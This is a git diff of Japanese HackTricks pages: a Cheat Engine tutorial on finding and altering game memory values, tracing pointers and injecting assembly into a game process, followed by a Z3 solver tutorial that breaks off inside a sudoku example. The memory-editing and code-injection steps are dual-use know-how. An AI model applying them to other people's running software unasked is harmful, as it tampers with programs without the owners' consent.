* **HackTricks**の[**GitHubリポジトリ**](https://github.com/carlospolop/hacktricks)と[**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud)にPRを提出して、あなたのハッキングのコツを共有する。
|
||||
|
||||
</details>
|
||||
|
|
|
@ -1,191 +1,188 @@
|
|||
<details>
|
||||
|
||||
<summary><a href="https://cloud.hacktricks.xyz/pentesting-cloud/pentesting-cloud-methodology"><strong>☁️ HackTricks Cloud ☁️</strong></a> -<a href="https://twitter.com/hacktricks_live"><strong>🐦 Twitter 🐦</strong></a> - <a href="https://www.twitch.tv/hacktricks_live/schedule"><strong>🎙️ Twitch 🎙️</strong></a> - <a href="https://www.youtube.com/@hacktricks_LIVE"><strong>🎥 Youtube 🎥</strong></a></summary>
|
||||
<summary><strong>AWSハッキングをゼロからヒーローまで学ぶには</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
|
||||
|
||||
- **サイバーセキュリティ会社**で働いていますか? **HackTricksで会社を宣伝**したいですか?または、**最新バージョンのPEASSを入手**したいですか、またはHackTricksを**PDFでダウンロード**したいですか?[**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)をチェックしてください!
|
||||
HackTricksをサポートする他の方法:
|
||||
|
||||
- [**The PEASS Family**](https://opensea.io/collection/the-peass-family)を見つけてください、独占的な[**NFT**](https://opensea.io/collection/the-peass-family)のコレクションです。
|
||||
|
||||
- [**公式のPEASS&HackTricksのグッズ**](https://peass.creator-spring.com)を手に入れましょう。
|
||||
|
||||
- [**💬**](https://emojipedia.org/speech-balloon/) [**Discordグループ**](https://discord.gg/hRep4RUj7f)または[**テレグラムグループ**](https://t.me/peass)に参加するか、**Twitter**で[**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/hacktricks_live)**をフォロー**してください。
|
||||
|
||||
- **ハッキングのトリックを共有する**には、[hacktricksリポジトリ](https://github.com/carlospolop/hacktricks)と[hacktricks-cloudリポジトリ](https://github.com/carlospolop/hacktricks-cloud)にPRを提出してください。
|
||||
* **HackTricksにあなたの会社を広告したい**、または**HackTricksをPDFでダウンロードしたい**場合は、[**サブスクリプションプラン**](https://github.com/sponsors/carlospolop)をチェックしてください。
|
||||
* [**公式PEASS & HackTricksグッズ**](https://peass.creator-spring.com)を入手する
|
||||
* [**The PEASS Family**](https://opensea.io/collection/the-peass-family)を発見し、独占的な[**NFTs**](https://opensea.io/collection/the-peass-family)のコレクションを見る
|
||||
* 💬 [**Discordグループ**](https://discord.gg/hRep4RUj7f)に**参加する**か、[**telegramグループ**](https://t.me/peass)に参加するか、**Twitter** 🐦 [**@carlospolopm**](https://twitter.com/carlospolopm)を**フォローする**。
|
||||
* **HackTricks**のGitHubリポジトリにPRを提出して、あなたのハッキングのコツを共有してください。
|
||||
|
||||
</details>
|
||||
|
||||
|
||||
[**Cheat Engine**](https://www.cheatengine.org/downloads.php)は、実行中のゲームのメモリ内に重要な値が保存されている場所を見つけて変更するための便利なプログラムです。\
|
||||
ダウンロードして実行すると、ツールの使用方法についてのチュートリアルが表示されます。ツールの使用方法を学びたい場合は、チュートリアルを完了することを強くお勧めします。
|
||||
[**Cheat Engine**](https://www.cheatengine.org/downloads.php)は、実行中のゲームのメモリ内に重要な値が保存されている場所を見つけて変更するのに役立つプログラムです。\
|
||||
ダウンロードして実行すると、ツールの使用方法に関する**チュートリアル**が**表示されます**。このツールの使用方法を学びたい場合は、それを完了することを強くお勧めします。
|
||||
|
||||
# 何を探していますか?
|
||||
|
||||
![](<../../.gitbook/assets/image (580).png>)
|
||||
|
||||
このツールは、プログラムのメモリ内にある**特定の値**(通常は数値)が保存されている場所を見つけるのに非常に便利です。\
|
||||
通常、数値は**4バイト**形式で保存されますが、**倍精度**や**単精度**の形式で見つけることもあります。また、数値以外のものを探したい場合もあります。そのため、**検索する内容**を**選択**する必要があります。
|
||||
このツールは、プログラムのメモリ内に**ある値**(通常は数字)が**どこに保存されているか**を見つけるのに非常に役立ちます。\
|
||||
**通常、数字**は**4バイト**形式で保存されますが、**ダブル**や**フロート**形式で見つかることもありますし、数字**以外のもの**を探したい場合もあります。そのため、何を**検索するか**を選択する必要があります:
|
||||
|
||||
![](<../../.gitbook/assets/image (581).png>)
|
||||
|
||||
また、**異なる種類の検索**を指定することもできます。
|
||||
また、**異なる**タイプの**検索**を指定することもできます:
|
||||
|
||||
![](<../../.gitbook/assets/image (582).png>)
|
||||
|
||||
メモリのスキャン中にゲームを**停止**するためのチェックボックスもチェックできます。
|
||||
メモリをスキャンしている間にゲームを**停止する**ためのチェックボックスもあります:
|
||||
|
||||
![](<../../.gitbook/assets/image (584).png>)
|
||||
|
||||
## ホットキー
|
||||
|
||||
_**編集 --> 設定 --> ホットキー**_で、**ゲームを停止**するなど、さまざまな目的に対して異なる**ホットキー**を設定できます(メモリのスキャンを行いたい場合には非常に便利です)。他のオプションも利用できます。
|
||||
_**編集 --> 設定 --> ホットキー**_ で、ゲームを**停止する**などの異なる目的のための**ホットキー**を設定できます。他のオプションも利用可能です:
|
||||
|
||||
![](<../../.gitbook/assets/image (583).png>)
|
||||
|
||||
# 値の変更
|
||||
|
||||
探している**値**の場所を**見つけたら**(次のステップで詳しく説明します)、それをダブルクリックして**変更**し、その値をダブルクリックします。
|
||||
**見つけた**値を**探している**場所(次のステップで詳しく説明します)をダブルクリックして、その値をダブルクリックして**変更する**ことができます:
|
||||
|
||||
![](<../../.gitbook/assets/image (585).png>)
|
||||
|
||||
そして、変更をメモリに反映させるためにチェックを入れます。
|
||||
そして、最後にチェックを**マークして**メモリに変更を適用します:
|
||||
|
||||
![](<../../.gitbook/assets/image (586).png>)
|
||||
|
||||
メモリへの変更は即座に適用されます(ゲームがこの値を再度使用するまで、値はゲーム内で更新されません)。
|
||||
メモリへの**変更**は即座に**適用されます**(ゲームがこの値を再び使用するまで、ゲーム内の値は**更新されません**)。
|
||||
|
||||
# 値の検索
|
||||
|
||||
したがって、重要な値(ユーザーのライフなど)を改善したいとし、その値をメモリ内で検索しているとします。
|
||||
したがって、ユーザーのライフのような重要な値を改善したいと考えており、その値をメモリで探しているとします。
|
||||
|
||||
## 既知の変更を通じて
|
||||
|
||||
値が100であることを探して、その値を検索して多くの一致を見つけました。
|
||||
値100を探しているとしましょう。スキャンを**実行**してその値を探し、多くの一致を見つけます:
|
||||
|
||||
![](<../../.gitbook/assets/image (587).png>)
|
||||
|
||||
次に、値が変更されるように何かを行い、ゲームを停止して**次のスキャン**を実行します。
|
||||
次に、**値が変更される**ようなことをして、ゲームを**停止**して、**次のスキャン**を**実行**します:
|
||||
|
||||
![](<../../.gitbook/assets/image (588).png>)
|
||||
|
||||
Cheat Engineは、100から新しい値に変わった**値**を検索します。おめでとうございます、探していた値の**アドレス**を見つけました。これで変更できます。\
|
||||
_複数の値がまだある場合は、再びその値を変更するための何かを行い、別の「次のスキャン」を実行してアドレスをフィルタリングします。_
|
||||
Cheat Engineは、100から新しい値に**変わった値**を検索します。おめでとうございます、探していた値の**アドレス**を**見つけました**。これで変更できます。\
|
||||
_まだいくつかの値がある場合は、その値を再度変更する何かをして、別の「次のスキャン」を実行してアドレスをフィルタリングします。_
|
||||
|
||||
## 未知の値、既知の変更
|
||||
|
||||
値を知らないが、**変更方法**(変更の値さえも)を知っている場合、その数値を探すことができます。
|
||||
**値がわからない**が、**それを変更する方法を知っている**場合(変更の値さえも)、その数値を探すことができます。
|
||||
|
||||
まず、タイプが「**未知の初期値**」のスキャンを実行します。
|
||||
まず、「**未知の初期値**」のタイプでスキャンを実行します:
|
||||
|
||||
![](<../../.gitbook/assets/image (589).png>)
|
||||
|
||||
次に、値を変更し、**値が変更された方法**(私の場合は1減少した)を示し、**次のスキャン**を実行します。
|
||||
次に、値を変更し、**値がどのように変更されたか**を指定し(私の場合は1減少しました)、**次のスキャン**を実行します:
|
||||
|
||||
![](<../../.gitbook/assets/image (590).png>)
|
||||
|
||||
選択した方法で変更された**すべての値**が表示されます。
|
||||
選択した方法で**変更されたすべての値**が表示されます:
|
||||
|
||||
![](<../../.gitbook/assets/image (591).png>)
|
||||
|
||||
値が見つかったら、変更できます。
|
||||
値を見つけたら、それを変更できます。
|
||||
|
||||
可能な変更は**たくさんあり**、これらのステップを**何度でも**繰り返して結果をフィルタリングできます。
|
||||
**多くの可能な変更**があり、結果をフィルタリングするためにこれらの**ステップを何度でも実行できる**ことに注意してください:
|
||||
|
||||
![](<../../.gitbook/assets/image (592).png>)
|
||||
|
||||
## ランダムメモリアドレス - コードの検索
|
||||
|
||||
これまでに、値を格納しているアドレスを見つける方法を学びましたが、**ゲームの異なる実行では、そのアドレスはメモリの異なる場所にある可能性が非常に高い**です。そこで、常にそのアドレスを見つける方法を見つけましょう。
|
||||
これまでに、値を保存しているアドレスを見つける方法を学びましたが、**ゲームの異なる実行ではそのアドレスがメモリの異なる場所にある**可能性が高いです。では、そのアドレスを常に見つける方法を見てみましょう。
|
||||
|
||||
いくつかのトリックを使用して、現在のゲームが重要な値を格納しているアドレスを見つけます。次に(ゲームを停止する場合は)見つかった**アドレス**を**右クリック**して、「**このアドレスを使用しているものを検索**」または「**このアドレスに書き込んでいるものを検索**」を選択します。
|
||||
前述のトリックのいくつかを使用して、現在のゲームが重要な値を保存しているアドレスを見つけます。次に(ゲームを停止したい場合は停止して)、見つかった**アドレス**を右クリックして、「**このアドレスにアクセスするものを見つける**」または「**このアドレスに書き込むものを見つける**」を選択します:
|
||||
|
||||
![](<../../.gitbook/assets/image (593).png>)
|
||||
|
||||
**最初のオプション**は、この**アドレスを使用しているコードのどの部分**を知るのに役立ちます(これはゲームのコードを変更できる場所を知るためにも役立ちます)。\
|
||||
**2番目のオプション**は、より**具体的**で、この場合は**どこからこの値が書き込まれているか**を知るのに役立ちます。
|
||||
**最初のオプション**は、この**アドレス**を**使用しているコード**の**部分**を知るのに役立ちます(ゲームのコードを**変更する場所**など、より多くのことに役立ちます)。\
|
||||
**2番目のオプション**はより**具体的**で、この場合はこの値が**どこから書き込まれているか**を知ることに興味があるため、より役立ちます。
|
||||
|
||||
これらのオプションのいずれかを選択すると、**デバッガ**がプログラムに**アタッチ**され、新しい**空のウィンドウ**が表示されます。今、**ゲーム**を**プレイ**し、その**値**を**変更**します(ゲームを再起動せずに)。**ウィンドウ**には、**値を変更しているアドレス**が**表示**されるはずです。
|
||||
これらのオプションのいずれかを選択すると、**デバッガー**がプログラムに**アタッチ**され、新しい**空のウィンドウ**が表示されます。今、**ゲームをプレイ**してその**値を変更**してください(ゲームを再起動せずに)。**ウィンドウ**は、値を**変更しているアドレス**で**埋め尽くされる**はずです:
|
||||
|
||||
![](<../../.gitbook/assets/image (594).png>)
|
||||
|
||||
値を変更しているアドレスを見つけたら、**コードを自由に変更**できます(Cheat Engineを使用して簡単に変更できます)。
|
||||
値を変更しているアドレスが見つかったら、**自由にコードを変更できます**(Cheat EngineではNOPsをすばやく変更することができます):
|
||||
|
||||
![](<../../.gitbook/assets/image (595).png>)
|
||||
|
||||
したがって、コードを変更して数値に影響を与えないようにしたり、常に正の影響を与えるようにしたりできます。
|
||||
したがって、コードがあなたの数値に影響を与えないように、または常に肯定的な方法で影響を与えるように変更できます。
|
||||
|
||||
## ランダムメモリアドレス - ポインタの検索
|
||||
## ランダムメモリアドレス - ポインターの検索
|
||||
|
||||
前の手順に従って、興味のある値がある場所を見つけます。次に、「**このアドレスに書き込んでいるものを検索**」を使用して、この値を書き込んでいるアドレスを見つけ、それをダブルクリックしてディスアセンブリビューを取得します。
|
||||
前のステップに従って、興味のある値がどこにあるかを見つけます。次に、「**このアドレスに書き込むものを見つける**」を使用して、この値に書き込むアドレスを見つけ、ディスアセンブリビューを取得するためにダブルクリックします:
|
||||
|
||||
![](<../../.gitbook/assets/image (596).png>)
|
||||
|
||||
次に、**"\[\]"**(この場合の$edxの値)の間の16進数値を検索する新しいスキャンを実行します。
|
||||
次に、「\[]」の間の16進数の値を**検索する**ために新しいスキャンを実行します(この場合は$edxの値):
|
||||
|
||||
![](<../../.gitbook/assets/image (597).png>)
|
||||
|
||||
(複数の場合は通常、最小のアドレスが必要です)\
|
||||
これで、**興味のある値を変更するポインタ**を見つけました。
|
||||
(_複数表示される場合は、通常はアドレスが最小のものが必要です_)\
|
||||
これで、興味のある値を変更する**ポインターを見つけました**。
|
||||
|
||||
「**アドレスを手動で追加**」をクリックします。
|
||||
「**手動でアドレスを追加**」をクリックします:
|
||||
|
||||
![](<../../.gitbook/assets/image (598).png>)
|
||||
|
||||
次に、「ポインタ」のチェックボックスをクリックし、テキストボックスに見つかったアドレスを追加します(このシナリオでは、前の画像で見つかったアドレスは「Tutorial-i386.exe」+2426B0でした)。
|
||||
次に、「ポインター」のチェックボックスをクリックし、テキストボックスに見つかったアドレスを追加します(このシナリオでは、前の画像で見つかったアドレスは「Tutorial-i386.exe」+2426B0でした):
|
||||
|
||||
![](<../../.gitbook/assets/image (599).png>)
|
||||
|
||||
(ポインタアドレスを入力すると、最初の「アドレス」が自動的に入力されることに注意してください)
|
||||
(最初の「アドレス」は、あなたが導入するポインターアドレスから自動的に生成されることに注意してください)
|
||||
|
||||
OKをクリックすると、新しいポインタが作成されます。
|
||||
OKをクリックすると、新しいポインターが作成されます:
|
||||
|
||||
![](<../../.gitbook/assets/image (600).png>)
|
||||
|
||||
これで、値が異なるメモリアドレスにある場合でも、その値を変更するたびに重要な値が変更されます。
|
||||
これで、値が保存されているメモリアドレスが異なる場合でも、その値を変更するたびに**重要な値を変更しています。**
|
||||
|
||||
## コードインジェクション
|
||||
|
||||
コードインジェクションは、ターゲットプロセスにコードの一部を注入し、コードの実行を自分自身の書かれたコードにリダイレクトする技術です(ポイントを減らす代わりにポイントを与えるなど)。
|
||||
コードインジェクションは、ターゲットプロセスにコードの一部を注入し、実行されるコードのルートを変更して、自分で書いたコードを通過させる技術です(ポイントを減らす代わりに与えるなど)。
|
||||
|
||||
したがって、プレイヤーのライフを1減らしているアドレスを見つけたとします。
|
||||
プレイヤーのライフから1を引くアドレスを見つけたと想像してください:
|
||||
|
||||
![](<../../.gitbook/assets/image (601).png>)
|
||||
|
||||
「ディスアセンブラを表示」をクリックして、**ディスアセンブルコード**を取得します。\
|
||||
次に、**CTRL+a**をクリックしてオートアセンブルウィンドウを呼び出し、_**テンプレート --> コードインジェクション**_を選択します。
|
||||
**ディスアセンブルコード**を取得するには、ディスアセンブラを表示をクリックします。\
|
||||
次に、**CTRL+a**を押してオートアセンブルウィンドウを呼び出し、_**テンプレート --> コードインジェクション**_ を選択します
|
||||
|
||||
![](<../../.gitbook/assets/image (602).png>)
|
||||
|
||||
**変更したい命令のアドレス**を入力します(通常は自動入力されます)。
|
||||
変更したい命令の**アドレスを記入**します(これは通常自動的に記入されます):
|
||||
|
||||
![](<../../.gitbook/assets/image (603).png>)
|
||||
|
||||
テンプレートが生成されます。
|
||||
テンプレートが生成されます:
|
||||
|
||||
![](<../../.gitbook/assets/image (604).png>)
|
||||
|
||||
したがって、新しいアセンブリコードを「**newmem**」セクションに挿入し、オリジナルのコードを実行しない場合は「**originalcode**」から削除します。この例では、注入されるコードは1を減算する代わりに2ポイントを追加します。
|
||||
したがって、「**newmem**」セクションに新しいアセンブリコードを挿入し、「**originalcode**」から元のコードを削除します(実行されたくない場合)。この例では、注入されたコードは1を引く代わりに2ポイントを追加します:
|
||||
|
||||
![](<../../.gitbook/assets/image (605).png>)
|
||||
|
||||
**実行**をクリックすると、コードがプログラムに注入され、機能の動作が変更されます。
|
||||
**実行をクリックして続行すると、プログラムの機能の動作が変更されたコードがプログラムに注入されるはずです!**
|
||||
|
||||
# **参考文献**
|
||||
|
||||
* **Cheat Engineのチュートリアル、Cheat Engineの始め方を学ぶために完了してください**
|
||||
* **Cheat Engineチュートリアル、Cheat Engineの使い方を学ぶために完了してください**
|
||||
|
||||
|
||||
|
||||
<details>
|
||||
|
||||
<summary><a href="https://cloud.hacktricks.xyz/pentesting-cloud/pentesting-cloud-methodology"><strong>☁️ HackTricks Cloud ☁️</strong></a> -<a href="https://twitter.com/hacktricks_live"><strong>🐦 Twitter 🐦</strong></a> - <a href="https://www.twitch.tv/hacktricks_live/schedule"><strong>🎙️ Twitch 🎙️</strong></a> - <a href="https://www.youtube.com/@hacktricks_LIVE"><strong>🎥 Youtube 🎥</strong></a></summary>
|
||||
<summary><strong>AWSハッキングをゼロからヒーローまで学ぶには</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
|
||||
|
||||
- **サイバーセキュリティ企業で働いていますか? HackTricksであなたの会社を宣伝したいですか?または、最新バージョンのPEASSにアクセスしたり、HackTricksをPDFでダウンロードしたりしたいですか? [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)をチェックしてください!**
|
||||
HackTricksをサポートする他の方法:
|
||||
|
||||
- [**The PEASS Family**](https://opensea.io/collection/the-peass-family)を発見しましょう、私たちの独占的な[**NFT**](https://opensea.io/collection/the-peass-family)のコレクション
|
||||
|
||||
- [**公式のPEASS&HackTricksのスワッグ**](https://peass.creator-spring.com)を手に入れましょう
|
||||
|
||||
- **[💬](https://emojipedia.org/speech-balloon/) [Discordグループ](https://discord.gg/hRep4RUj7f)**または**[Telegramグループ](https://t.me/peass)**に参加するか、**Twitter** [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/hacktricks_live)**をフォローしてください。**
|
||||
|
||||
- **ハッキングのトリックを共有するには、[hacktricksリポジトリ](https://github.com/carlospolop/hacktricks)と[hacktricks-cloudリポジトリ](https://github.com/carlospolop/hacktricks-cloud)にPRを提出してください。**
|
||||
* **HackTricksにあなたの会社を広告したい**、または**HackTricksをPDFでダウンロードしたい**場合は、[**サブスクリプションプラン**](https://github.com/sponsors/carlospolop)をチェックしてください。
|
||||
* [**公式PEASS & HackTricksグッズ**](https://peass.creator-spring.com)を入手する
|
||||
* [**The PEASS Family**](https://opensea.io/collection/the-peass-family)を発見し、独占的な[**NFTs**](https://opensea.io/collection/the-peass-family)のコレクションを見る
|
||||
* 💬 [**Discordグループ**](https://discord.gg/hRep4RUj7f)に**参加する**か、[**telegramグループ**](https://t.me/peass)に参加するか、**Twitter** 🐦 [**@carlospolopm**](https://twitter.com/carlospolopm)を**フォローする**。
|
||||
* **HackTricks**のGitHubリポジトリにPRを提出して、あなたのハッキングのコツを共有してください。
|
||||
|
||||
</details>
|
||||
|
|
|
@ -1,25 +1,23 @@
|
|||
<details>
|
||||
|
||||
<summary><a href="https://cloud.hacktricks.xyz/pentesting-cloud/pentesting-cloud-methodology"><strong>☁️ HackTricks Cloud ☁️</strong></a> -<a href="https://twitter.com/hacktricks_live"><strong>🐦 Twitter 🐦</strong></a> - <a href="https://www.twitch.tv/hacktricks_live/schedule"><strong>🎙️ Twitch 🎙️</strong></a> - <a href="https://www.youtube.com/@hacktricks_LIVE"><strong>🎥 Youtube 🎥</strong></a></summary>
|
||||
<summary><strong>AWSハッキングをゼロからヒーローまで学ぶには</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>をご覧ください!</strong></summary>
|
||||
|
||||
- **サイバーセキュリティ企業**で働いていますか? **HackTricksで会社を宣伝**したいですか?または、**最新バージョンのPEASSにアクセスしたり、HackTricksをPDFでダウンロード**したいですか?[**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)をチェックしてください!
|
||||
HackTricksをサポートする他の方法:
|
||||
|
||||
- [**The PEASS Family**](https://opensea.io/collection/the-peass-family)を見つけてください、独占的な[**NFT**](https://opensea.io/collection/the-peass-family)のコレクションです。
|
||||
|
||||
- [**公式のPEASS&HackTricksのグッズ**](https://peass.creator-spring.com)を手に入れましょう。
|
||||
|
||||
- [**💬**](https://emojipedia.org/speech-balloon/) [**Discordグループ**](https://discord.gg/hRep4RUj7f)または[**telegramグループ**](https://t.me/peass)に**参加**するか、**Twitter**で**フォロー**してください[**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
|
||||
|
||||
- **ハッキングのトリックを共有するには、[hacktricksリポジトリ](https://github.com/carlospolop/hacktricks)と[hacktricks-cloudリポジトリ](https://github.com/carlospolop/hacktricks-cloud)にPRを提出してください。**
|
||||
* **HackTricksにあなたの会社を広告掲載したい場合**や**HackTricksをPDFでダウンロードしたい場合**は、[**サブスクリプションプラン**](https://github.com/sponsors/carlospolop)をチェックしてください!
|
||||
* [**公式PEASS & HackTricksグッズ**](https://peass.creator-spring.com)を入手する
|
||||
* [**The PEASS Family**](https://opensea.io/collection/the-peass-family)を発見し、独占的な[**NFTs**](https://opensea.io/collection/the-peass-family)のコレクションをご覧ください
|
||||
* 💬 [**Discordグループ**](https://discord.gg/hRep4RUj7f)や[**テレグラムグループ**](https://t.me/peass)に**参加する**か、**Twitter** 🐦 [**@carlospolopm**](https://twitter.com/carlospolopm)を**フォローしてください。**
|
||||
* [**HackTricks**](https://github.com/carlospolop/hacktricks)と[**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud)のgithubリポジトリにPRを提出して、あなたのハッキングテクニックを共有してください。
|
||||
|
||||
</details>
|
||||
|
||||
|
||||
非常に基本的に、このツールは、いくつかの条件を満たす必要がある変数の値を見つけるのに役立ちます。手計算で計算するのは非常に面倒です。したがって、Z3に変数が満たす必要のある条件を指示することができ、それが可能であればいくつかの値を見つけることができます。
|
||||
このツールは基本的に、手計算で満たすべき条件を持つ変数の値を見つけるのが非常に面倒な場合に役立ちます。したがって、変数が満たすべき条件をZ3に指示すると、可能であればいくつかの値を見つけてくれます。
|
||||
|
||||
# 基本的な操作
|
||||
# 基本操作
|
||||
|
||||
## ブール値/And/Or/Not
|
||||
## ブール/And/Or/Not
|
||||
```python
|
||||
#pip3 install z3-solver
|
||||
from z3 import *
|
||||
|
@ -34,9 +32,7 @@ s.add(And(Or(x,y,Not(z)),y))
|
|||
s.check() #If response is "sat" then the model is satifable, if "unsat" something is wrong
|
||||
print(s.model()) #Print valid values to satisfy the model
|
||||
```
|
||||
## Ints/Simplify/Reals
|
||||
|
||||
整数/簡略化/実数
|
||||
## 整数/単純化/実数
|
||||
```python
|
||||
from z3 import *
|
||||
|
||||
|
@ -56,23 +52,7 @@ print(solve(r1**2 + r2**2 == 3, r1**3 == 2))
|
|||
set_option(precision=30)
|
||||
print(solve(r1**2 + r2**2 == 3, r1**3 == 2))
|
||||
```
|
||||
## モデルの表示
|
||||
|
||||
To print the model, you can use the `model` method provided by the Z3 library. This method returns a string representation of the model.
|
||||
|
||||
モデルを表示するには、Z3ライブラリが提供する`model`メソッドを使用します。このメソッドは、モデルの文字列表現を返します。
|
||||
|
||||
```python
|
||||
print(s.model())
|
||||
```
|
||||
|
||||
```python
|
||||
print(s.model())
|
||||
```
|
||||
|
||||
The output will display the values assigned to each variable in the model.
|
||||
|
||||
出力には、モデル内の各変数に割り当てられた値が表示されます。
|
||||
## モデルの印刷
|
||||
```python
|
||||
from z3 import *
|
||||
|
||||
|
@ -86,9 +66,9 @@ print ("x = %s" % m[x])
|
|||
for d in m.decls():
|
||||
print("%s = %s" % (d.name(), m[d]))
|
||||
```
|
||||
# マシンの算術
|
||||
# マシン算術
|
||||
|
||||
現代のCPUと主流のプログラミング言語は、**固定サイズのビットベクトル**上での算術を使用しています。マシンの算術は、Z3Pyでは**ビットベクトル**として利用できます。
|
||||
現代のCPUと主流のプログラミング言語は、**固定サイズのビットベクトル**上での算術を使用します。マシン算術はZ3Pyで**ビットベクトル**として利用可能です。
|
||||
```python
|
||||
from z3 import *
|
||||
|
||||
|
@ -103,9 +83,9 @@ a = BitVecVal(-1, 32)
|
|||
b = BitVecVal(65535, 32)
|
||||
print(simplify(a == b)) #This is False
|
||||
```
|
||||
## 符号付き/符号なしの数値
|
||||
## 符号付き/符号なし数値
|
||||
|
||||
Z3は、**ビットベクトルが符号付きか符号なしかによって処理が異なる**特別な符号付きバージョンの算術演算を提供します。Z3Pyでは、演算子**<、<=、>、>=、/、%、および>>**が**符号付き**バージョンに対応しています。対応する**符号なし**演算子は**ULT、ULE、UGT、UGE、UDiv、URem、およびLShR**です。
|
||||
Z3は、**ビットベクターが符号付きまたは符号なしとして扱われるか**によって違いが生じる場合に特別な符号付きの算術演算を提供します。Z3Pyでは、演算子 **<, <=, >, >=, /, % および >>** は**符号付き**バージョンに対応しています。対応する**符号なし**演算子は **ULT, ULE, UGT, UGE, UDiv, URem および LShR** です。
|
||||
```python
|
||||
from z3 import *
|
||||
|
||||
|
@ -125,9 +105,9 @@ solve(ULT(x, 0))
|
|||
```
|
||||
## 関数
|
||||
|
||||
**解釈された関数**は、**関数 +** が**固定された標準的な解釈**を持つ算術などの関数です(2つの数を足します)。**解釈されていない関数**と定数は**最大限の柔軟性**を持ち、関数または定数に関する制約と**整合性のある****任意の解釈**を許容します。
|
||||
**解釈される関数** は、例えば算術において**関数 +** は**固定された標準的な解釈**を持っています(二つの数を加算します)。**解釈されない関数**と定数は**最大限に柔軟**です。それらは関数や定数に対する**制約**と**矛盾しない**任意の解釈を可能にします。
|
||||
|
||||
例:xに対してfを2回適用すると、再びxになりますが、xに対してfを1回適用するとxとは異なります。
|
||||
例:f が x に対して二回適用されると再び x になりますが、f が一回 x に適用されると x とは異なります。
|
||||
```python
|
||||
from z3 import *
|
||||
|
||||
|
@ -149,130 +129,6 @@ print(m.model())
|
|||
# 例
|
||||
|
||||
## 数独ソルバー
|
||||
|
||||
```python
|
||||
from z3 import *
|
||||
|
||||
def solve_sudoku(grid):
|
||||
# Create a 9x9 grid of integer variables
|
||||
cells = [[Int(f"cell_{i}_{j}") for j in range(9)] for i in range(9)]
|
||||
|
||||
# Each cell must contain a value between 1 and 9
|
||||
cell_constraints = [And(1 <= cells[i][j], cells[i][j] <= 9) for i in range(9) for j in range(9)]
|
||||
|
||||
# Each row must contain distinct values
|
||||
row_constraints = [Distinct(cells[i]) for i in range(9)]
|
||||
|
||||
# Each column must contain distinct values
|
||||
column_constraints = [Distinct([cells[i][j] for i in range(9)]) for j in range(9)]
|
||||
|
||||
# Each 3x3 subgrid must contain distinct values
|
||||
subgrid_constraints = [Distinct([cells[i + k][j + l] for k in range(3) for l in range(3)]) for i in range(0, 9, 3) for j in range(0, 9, 3)]
|
||||
|
||||
# Add the initial values to the grid
|
||||
initial_constraints = [cells[i][j] == grid[i][j] for i in range(9) for j in range(9) if grid[i][j] != 0]
|
||||
|
||||
# Create the solver and add all the constraints
|
||||
solver = Solver()
|
||||
solver.add(cell_constraints + row_constraints + column_constraints + subgrid_constraints + initial_constraints)
|
||||
|
||||
# Check if there is a solution
|
||||
if solver.check() == sat:
|
||||
# Get the solution
|
||||
model = solver.model()
|
||||
|
||||
# Extract the values from the model
|
||||
solution = [[model.evaluate(cells[i][j]).as_long() for j in range(9)] for i in range(9)]
|
||||
|
||||
return solution
|
||||
|
||||
return None
|
||||
|
||||
# Example Sudoku grid
|
||||
grid = [
|
||||
[5, 3, 0, 0, 7, 0, 0, 0, 0],
|
||||
[6, 0, 0, 1, 9, 5, 0, 0, 0],
|
||||
[0, 9, 8, 0, 0, 0, 0, 6, 0],
|
||||
[8, 0, 0, 0, 6, 0, 0, 0, 3],
|
||||
[4, 0, 0, 8, 0, 3, 0, 0, 1],
|
||||
[7, 0, 0, 0, 2, 0, 0, 0, 6],
|
||||
[0, 6, 0, 0, 0, 0, 2, 8, 0],
|
||||
[0, 0, 0, 4, 1, 9, 0, 0, 5],
|
||||
[0, 0, 0, 0, 8, 0, 0, 7, 9]
|
||||
]
|
||||
|
||||
# Solve the Sudoku
|
||||
solution = solve_sudoku(grid)
|
||||
|
||||
# Print the solution
|
||||
if solution:
|
||||
for row in solution:
|
||||
print(row)
|
||||
else:
|
||||
print("No solution found.")
|
||||
```
|
||||
|
||||
```python
|
||||
from z3 import *
|
||||
|
||||
def solve_sudoku(grid):
|
||||
# 9x9の整数変数のグリッドを作成
|
||||
cells = [[Int(f"cell_{i}_{j}") for j in range(9)] for i in range(9)]
|
||||
|
||||
# 各セルは1から9の値を含む必要がある
|
||||
cell_constraints = [And(1 <= cells[i][j], cells[i][j] <= 9) for i in range(9) for j in range(9)]
|
||||
|
||||
# 各行は異なる値を含む必要がある
|
||||
row_constraints = [Distinct(cells[i]) for i in range(9)]
|
||||
|
||||
# 各列は異なる値を含む必要がある
|
||||
column_constraints = [Distinct([cells[i][j] for i in range(9)]) for j in range(9)]
|
||||
|
||||
# 各3x3のサブグリッドは異なる値を含む必要がある
|
||||
subgrid_constraints = [Distinct([cells[i + k][j + l] for k in range(3) for l in range(3)]) for i in range(0, 9, 3) for j in range(0, 9, 3)]
|
||||
|
||||
# グリッドに初期値を追加
|
||||
initial_constraints = [cells[i][j] == grid[i][j] for i in range(9) for j in range(9) if grid[i][j] != 0]
|
||||
|
||||
# ソルバーを作成し、すべての制約を追加
|
||||
solver = Solver()
|
||||
solver.add(cell_constraints + row_constraints + column_constraints + subgrid_constraints + initial_constraints)
|
||||
|
||||
# 解が存在するかチェック
|
||||
if solver.check() == sat:
|
||||
# 解を取得
|
||||
model = solver.model()
|
||||
|
||||
# モデルから値を抽出
|
||||
solution = [[model.evaluate(cells[i][j]).as_long() for j in range(9)] for i in range(9)]
|
||||
|
||||
